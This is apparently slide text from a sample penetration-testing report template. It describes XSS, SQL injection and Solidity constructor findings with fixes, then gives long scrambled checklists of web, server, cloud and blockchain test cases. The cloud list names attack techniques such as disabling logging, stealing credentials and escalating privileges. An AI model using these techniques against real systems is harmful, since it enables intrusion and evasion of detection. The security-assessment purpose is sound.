  • 7. Vulnerability #2 Stored Cross-Site Scripting (XSS) CVSS Score 7.7 Status: Resolved Severity: High Confidential 6 Stored XSS Vulnerability was found on the affected URLs. This allows an attacker to inject a script which gets stored in the application. When a victim navigates to the affected web page in a browser, the XSS payload will be served as part of the web page. This means that victims will inadvertently end-up executing the malicious script once the page is viewed in a browser. Details of Vulnerability: Stealing the victim's session token Stealing Login credential Stealing customer Credit Card Information The attacker-supplied code can perform a wide variety of actions, such as Impact: https://www.example.com/reference https://test.com/reference Additional References: In order to prevent Stored XSS attacks, the best way is to handle the input securely in both client-side and server-side code in a proper manner before it gets stored permanently on the web server. Suggested Fix 2 Suggested Fixes: Affected URL: http://example.com/test1n https://example.com/test2
  • 8. Vulnerability #3 SQL Injection CVSS Score 5 Status: Resolved Severity: Medium Confidential 7 SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query. Details of Vulnerability: https://www.example.com/reference https://test.com/reference Additional References: The most effective way to prevent SQL injection attacks is to use parameterized queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterized queries. Suggested Fix 2 Suggested Fixes: The JSON parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JSON parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.### HTTP Requests ###/CRUX/UIDL/ Steps to reproduce: Affected URL: https://www.example.co/form7
  • 9. Constructors are special functions that are called only once during the contract creation. They often perform critical, privileged actions such as setting the owner of the contract. Before Solidity version 0.4.22, the only way of defining a constructor was to create a function with the same name as the contract class containing it. A function meant to become a constructor becomes a normal, callable function if its name doesn't exactly match the contract name. This behavior sometimes leads to security issues, in particular when smart contract code is re-used with a different name but the name of the constructor function is not changed accordingly. Vulnerability #4 Incorrect Contructor Name CVSS Score 6.3 Status: Unsolved Severity: Medium Confidential 8 Details of Vulnerability: https://swcregistry.io/docs/SWC-118 Additional References: Solidity version 0.4.22 introduces a new constructor keyword that make a constructor definitions clearer. It is therefore recommended to upgrade the contract to a recent version of the Solidity compiler and change to the new constructor declaration. Suggested Fixes: Steps to reproduce: Affected URL: https://www.hacked.co
  • 10. OWASP Top 10 # 3. List of VAPT Tests Performed The following lists of tests are suggestive & not limited to the ones listed. Most importantly, every test case has multiple sub-test cases ranging from a few to sometimes 1000+ sub tests. Additional test cases will be performed based on factors such as: Technology Stack Server Side Programming Language, Front-end frameworks Framework/CMS/APIs Type of application (Payment integrations, external integrations) 1. 2. 3. 4. Confidential 9 Insufficient Logging and Monitoring SQL Injection Broken Authentication Sensitive Data Exposure XML External Entities (XXL) Broken Access Control Security Misconfiguration Cross-Site Scripting (XSS) Insecure Deserialization Using Components with Known Vulnerabilities 10 1 2 3 4 5 6 7 8 9 for Web Applications for Mobile Applications Extraneous Functionality Improper Platform Usage Insecure Data Storage Insecure Communication Insecure Authentication Insufficient Cryptography Insecure Authorization Client Mode Quality Code Tampering Reverse Engineering 10 1 2 3 4 5 6 7 8 9 3.1 OWASP Top 10
  • 11. Confidential 10 SANS 25 Improper Restriction of Operations within the Bounds of a Memory Buffer Improper Neutralization of Input During Web Page Generation ('XSS') Improper Input Validation Information Exposure Out-of-bounds Read Improper Neutralization of Special Elements used in an SQL Command (SQLi) Use After Free Integer Overflow or Wraparound Cross-Site Request Forgery (CSRF) Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Improper Neutralization of Special Elements used in an OS Command Out-of-bounds Write Improper Authentication NULL Pointer Dereference Incorrect Permission Assignment for Critical Resource Unrestricted Upload of File with Dangerous Type Improper Restriction of XML External Entity Reference Improper Control of Generation of Code ('Code Injection') Uncontrolled Resource Consumption Missing Release of Resource after Effective Lifetime Untrusted Search Path Deserialization of Untrusted Data Improper Certificate Validation Use of Hard-coded Credentials Improper Privilege Management # 25 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 3.2 SANS 25 Software Errors/Tests
  • 12. Other Tests Typical Severity OS Command Injection SQL Injection (Second Order) XML External Entity Injection LDAP Injection XPath Injection XML Injection ASP.NET Debugging Enabled DoS Locking Customer Accounts DoS Buffer Overflows Storing too much data in session (DoS) Writing user-provided data to disk (DoS) HTTP Insecure methods available on Server Out of band resource load (HTTP) File path manipulation Server-site JavaScript code injection Perl code injection Ruby code injection Python code injection Expression Language injection Unidentified code injection Client-side SQLi (Stored DOM-based) Server-side template injection SSL injection Stored XSS HTTP response header injection Reflected XSS Client-side template injection DOM-based XSS Reflected DOM-based XSS Stored DOM-based XSS DOM-based JavaScript Injection Reflected DOM-based JavaScript Injection Stored DOM-based JavaScript Injection Path-relative style sheet import Client-side SQLi (DOM-based) Client-side SQLi (Reflected DOM-based) # 35 36 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 High High High High High High High High Medium Medium High High High High High High High High High High High High High High High High High High High High High High High Information High High Confidential 11 3.3 174 Other Test Cases
  • 13. Other Test performed Typical Severity Duplicate cookies set WebSocket Hijacking (DOM-based) WebSocket Hijacking (Reflected DOM-based) WebSocket Hijacking (Stored DOM-based) Local Path Manipulation (DOM-based) Local Path Manipulation (Reflected DOM) Local Path Manipulation (Stored DOM-based) Client-side XPATH Injection (DOM-based) Client-side XPATH Injection (Reflected DOM) Client-side XPATH Injection (Stored DOM) Client-side JSON Injection (DOM-based) Client-side JSON Injection (Reflected DOM) Client-side JSON Injection (Stored DOM-based) Flash cross-domain policy Cross-origin resource sharing Cross-origin resource sharing (arbitrary) Cross-origin resource sharing (encrypted) Cross-origin resource sharing (all sub-domains) Cross-site Request Forgery (CSRF) SMTP header injection Cleartext submission of password External service interaction (DNS) External service interaction (HTTP) External service interaction (SMTP) Referrer dependent response Spoofable client IP address User-agent dependent response Password returned in a later response Password submitted using GET method Password returned in URL query string SQL statement in request parameter Cross-domain POST ASP.NET ViewState without MAC Enabled XML entity expansion Long redirection response Serialized object in HTTP message # 72 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 High High High High High High Low Low Low Low Low Low High Information High Low Low Medium Medium High High High Information Information Information Information Medium Low Low Medium Information Low Medium Information High Information Confidential 12
  • 14. Other Test performed Typical Severity Duplicate cookies set WebSocket Hijacking (DOM-based) WebSocket Hijacking (Reflected DOM-based) WebSocket Hijacking (Stored DOM-based) Local Path Manipulation (DOM-based) Local Path Manipulation (Reflected DOM) Local Path Manipulation (Stored DOM-based) Client-side XPATH Injection (DOM-based) Client-side XPATH Injection (Reflected DOM) Client-side XPATH Injection (Stored DOM) Client-side JSON Injection (DOM-based) Client-side JSON Injection (Reflected DOM) Client-side JSON Injection (Stored DOM-based) Flash cross-domain policy Cross-origin resource sharing Cross-origin resource sharing (arbitrary) Cross-origin resource sharing (encrypted) Cross-origin resource sharing (all sub-domains) Cross-site Request Forgery (CSRF) SMTP header injection Cleartext submission of password External service interaction (DNS) External service interaction (HTTP) External service interaction (SMTP) Referrer dependent response Spoofable client IP address User-agent dependent response Password returned in a later response Password submitted using GET method Password returned in URL query string SQL statement in request parameter Cross-domain POST ASP.NET ViewState without MAC Enabled XML entity expansion Long redirection response Serialized object in HTTP message # 108 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 High High High High High High Low Low Low Low Low Low High Information High Low Low Medium Medium High High High Information Information Information Information Medium Low Low Medium Information Low Medium Information High Information Confidential 13
  • 15. Other Test performed Typical Severity Link manipulation (DOM-based) Input returned in response (stored) Input returned in response (reflected) Suspicious input transformation (reflected) Suspicious input transformation (stored) Open redirection (stored) Open redirection (reflected) Open redirection (DOM-based) Open redirection (Stored DOM-based) Open redirection (Reflected DOM-based) SSl cookie without secure flag set Cookie scoped to parent domain Cross-domain referrer leakage Cross-domain script include Cookie without HTTPOnly flag set Session token in URL Password field with autocomplete enabled Password value set in cookie Browser cross-site scripting disabled HTTP TRACE method is enabled Cookie manipulation (DOM-based) Cookie manipulation (reflected DOM-based) Cookie manipulation (DOM-based) Ajax request header manipulation (DOM-based) Ajax request header manipulation (reflected) Ajax request header manipulation (stored DOM) Denial of service (DOM-based) Denial of service (reflected DOM-based) Denial of service (stored DOM-based) HTML5 web message manipulation DOM-based HTML5 web message manipulation (reflected) HTML5 web message manipulation (stored DOM) HTML5 storage manipulation (DOM-based) HTML5 storage manipulation (reflected DOM) HTML5 storage manipulation (stored DOM) # 143 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 Low Information Information Information Information Low Medium Low Low Medium Medium Low Information Information Low Medium Low Medium Infomration Information Low Low Low Low Low Low Information Information Low Information Information Information Information Information Information Confidential 14
  • 16. Other Test performed Typical Severity Mixed content Link manipulation (reflected DOM-based) Link manipulation (stored DOM-based) Link manipulation (reflected & stored) Document domain manipulation (DOM-based) Document domain manipulation reflected DOM Document domain manipulation (stored DOM) DOM data manipulation (DOM-based) CSS Injection (reflected & stored) Client-side HTTP parameter pollution (reflected) Client-side HTTP parameter pollution (Stored) Form action hijacking (reflected) Form action hijacking (stored) Database connection string disclosed Source code disclosure Directory listing Email addresses disclosed Private IP addresses disclosed Social security numbers disclosed Credit card numbers disclosed Private key disclosed Cacheable HTTPS response Base64 encoded data in parameter Multiple content types specified HTML does not specify charset HTML uses unrecognized charset Content type incorrectly stated Content ty[e is not specified SSL certificate Unencrypted communications Strict transport security not enforced # 174 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 Information Low Low Information Medium Medium Medium Information Medium Low Low Medium Medium Medium Low Information Information Information Information Information Information Information Information Information Information Information Low Information Medium Low Low Confidential 15
  • 17. Confidential 16 Server - Level Testing 3.4 Server - Level Test Cases Information Gathering Test RIA Cross-domain Policy Fingerprint Web Server Test Network/Infrastructure Configuration Test HTTP Methods Test HTTP Strict Transport Security (HSTS) Testing for Cookies Attributes 6 1 2 3 4 5 SSL/TLS Testing Insufficient public key length HeartBleed POODLE SSL Vulnerability ChangeCipherSpec Injection BREACH BEAST Forward Secrecy Support RC4 Support CRIME & Time Vulnerabilities Lucky13 HSTS: Check for header HSTS: Reasonable duration of MAX-AGE HSTS: Check for SubDomains support Certificate expiration 20 7 8 9 10 11 12 13 14 15 16 17 18 19
  • 18. Confidential 17 Host Name mismatch Weak/Insecure Hashing Algorithm SSLv2 support Weak ciphers check (Low, Anon, Null, Export) Null prefix in the certificate HTTPS stripping SurfJacking Non-SSL elements/content embedded in SSL Page Cache control 29 21 22 23 24 25 26 27 28 Configuration and Deploy Management Testing Test RIA cross domain policy Test Network/Infrastructure Configuration Test HTTP Methods Test HTTP Strict Transport Security Testing for Cookies Attributes 34 30 31 32 33 Cryptography Test HTTP Strict Transport Security Testing of Weak SSL/TLS Ciphers, Insufficient Transport layer Test HTTP Methods 37 35 36
  • 19. Confidential 18 Test Cases for Windows 3.5 Test Cases for Windows
  • 21. Test Cases for Android Confidential 20 3.6 Test Cases for Android and iOS
  • 25. Test Cases for Cloud Services Test for credential stealing attack on operation of a cloud key management service Test for Unauthenticated database access Test for Improper permissions for Database Test for compromising access keys Test for extracting keys from a VM / instance Test for exploits due to improper configs. Testing for public exploits in VM / instances Test for backdoors exploitation internally Test for Subdomain Takeover Test for access mgmt. Privilege Escalation Test for Remote Code Execution (RCE) Test for Role Enumeration Test for VM service Privilege Escalation Test for IAM Enumeration Test for BitBucket Server Data for credentials Test for cloud compromise by DNS rebinding Test for local Windows/Linux logs change Test for loopholes that add root certificates and SSH private keys to VMs and users Test for loopholes that assign a secondary private IP address to an instance / VM when you launch the instance / VM Test for unauthenticated obtaining of the VM images from storage accounts and do an analysis for passwords, keys, certificates to penetrate and access live resources Test for penetrating OS-level access to Instances/VMs via Workload Test for Management Service Privileges Test to run or deploy a workload with an assigned service or role and export instance credentials for those privileges Test for server and application versions & frameworks fingerprinting and detect exposed sensitive PII in server/application logs Test for CSV injection Test for MITM attack penetration on Elastic Load Balancer (ELB) for session hijacking Test for credential stealing attack on credentials Test for credential stealing attack on cloud workload # 28 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 3.7 Tests Cases for Cloud (AWS, Azure, GCP, and Other) Confidential 24
  • 26. Test to alter data in datastore for fraudulent transactions or static website compromise Test to alter a serverless function, logic app or otherwise a business logic implementation for action on objective or escalation Test to alter a DNS Record record set in a trusted zone and/or certificates for the resource record set to divert traffic, create phishing sites & abuse the brand (AWS ACM, AWS Route53, Azure DNS Service) Test to alter data in local SQL or MySQL databases Operate in regions where logging is not enabled or disable global logging (like CloudTrail) Test to alter log files in a non-validated log store or disable validation (like CloudTrail Log Validation) Test for Disable network traffic analysis/logging (VPC Flow Logs) Test for Disable Cloud Alerting to prevent detection and response Test for Disable data store access logging to prevent detection and response (CloudTrail Data Access, S3 Access Logging, etc.) Test to alter log retention or damage the integrity of logs (S3 lifecycle, KMS decryption, CMK key deletion/role privilege lockout) Process hooking, process injection, Windows access token manipulation, leveraging misconfigured sudo capabilities Test to create or reset a login, access key, or temporary credential belonging to a high privilege user (like IAM: CreateAccessKey, STS, or IAM: UpdateLoginProfile) Test to Change the default policy for a user or new users to include additional privileges (like Set-Default-Policy-Version) Leverage data or code pipelines to execute operations on behalf of their assumed roles (AWS data pipeline Shell-Command-Activity, inject python code into a pickle celery SQS queue) 29 30 31 32 33 34 35 36 37 38 39 40 41 42 Confidential 25
  • 27. Test Cases for Cloud Services Test for Function Default Visibility Test for Unencrypted Private Data On-Chain Test for Code With No Effects Test for Message call with hardcoded gas amount Test for Unexpected Ether balance Test for Hash Collisions With Multiple Variable Length Arguments Testing for Presence of unused variables Test for Right-To-Left-Override control character (U+202E) Test for Typographical Error Test for DoS With Block Gas Limit Test for Arbitrary Jump with Function Type Variable Test for Insufficient Gas Griefing Test for Incorrect Inheritance Order Test for Writing to Arbitrary Storage Location Test for Requirement Violation Test for Lack of Proper Signature Verification Test for local Missing Protection against Signature Replay Attacks Test for Weak Sources of Randomness from Chain Attributes Test for Shadowing State Variables Test for Incorrect Constructor Name Test for Signature Malleability Test for Blocking values as a proxy for time Test for Authorization through tx.origin Test for Transaction Order Dependence Test for DoS with Failed Call Test for Delegatecall to Untrusted Callee Test for Use of Deprecated Solidity Functions Test for Assert Violation Test for Uninitialized Storage Pointer Test for State Variable Default Visibility Test for Reentrancy Test for Unprotected SELFDESTRUCT Instruction Test for Unprotected Ether Withdrawal Test for Unchecked Call Return Value Test for Floating Pragma Test for Outdated Compiler Version Test for Integer Overflow and Underflow # 37 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 3.7 Tests Cases for Blockchain Confidential 26
  • 28. Your plug & play cyber security suite. Questions? Contact us at hello@getastra.com